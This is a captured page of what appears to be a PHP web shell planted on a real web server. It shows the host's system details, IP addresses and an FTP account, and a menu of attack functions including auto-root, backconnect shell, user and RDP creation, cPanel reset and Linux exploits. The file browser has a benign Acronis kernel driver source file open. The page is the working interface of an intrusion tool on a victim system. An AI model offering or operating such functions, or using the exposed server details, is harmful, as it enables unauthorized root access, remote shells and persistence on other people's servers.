Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1538 /
transport /
[ HOME SHELL ]
Name
Size
Permission
Action
device.c
1.18
KB
-rw-r--r--
device.h
257
B
-rw-r--r--
exec_event.c
6.9
KB
-rw-r--r--
exec_event.h
391
B
-rw-r--r--
exit_event.c
1.56
KB
-rw-r--r--
exit_event.h
291
B
-rw-r--r--
fork_event.c
8.58
KB
-rw-r--r--
fork_event.h
360
B
-rw-r--r--
fs_event.c
24.83
KB
-rw-r--r--
fs_event.h
2.43
KB
-rw-r--r--
message.c
19.42
KB
-rw-r--r--
message.h
3.94
KB
-rw-r--r--
ring.h
2.29
KB
-rw-r--r--
set.h
1.86
KB
-rw-r--r--
thread_safe_path.h
2.28
KB
-rw-r--r--
transport.c
55.47
KB
-rw-r--r--
transport.h
3.21
KB
-rw-r--r--
transport_id.h
1.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : device.c
/** @file @brief 'transport' device @details Copyright (c) 2017 Acronis International GmbH @author Mikhail Krivtsov (mikhail.krivtsov@acronis.com) @since $Id: $ */ #include "device.h" #include "debug.h" // DPRINTF #include "memory.h" #include "transport.h" #include "transport_protocol.h" #include <linux/errno.h> // error codes: ENOMEM #include <linux/fs.h> #include <linux/miscdevice.h> static const struct file_operations operations = { .owner = THIS_MODULE, .open = transport_device_open, .llseek = no_llseek, .read = transport_device_read, .write = transport_device_write, .unlocked_ioctl = transport_device_ioctl, .release = transport_device_release, .mmap = transport_device_mmap, }; static struct miscdevice miscdevice = { .minor = MISC_DYNAMIC_MINOR, .name = TRANSPORT_DEVICE_NAME, .fops = &operations, }; int __init device_mod_init(void) { int ret; ret = misc_register(&miscdevice); if (ret) { EPRINTF("'misc_register()' failure %i", ret); goto out; } DPRINTF("miscdevice.minor=%i", miscdevice.minor); // Note: 'ret' is already 0 here out: return ret; } void device_mod_down(void) { DPRINTF(""); misc_deregister(&miscdevice); DPRINTF(""); }
Close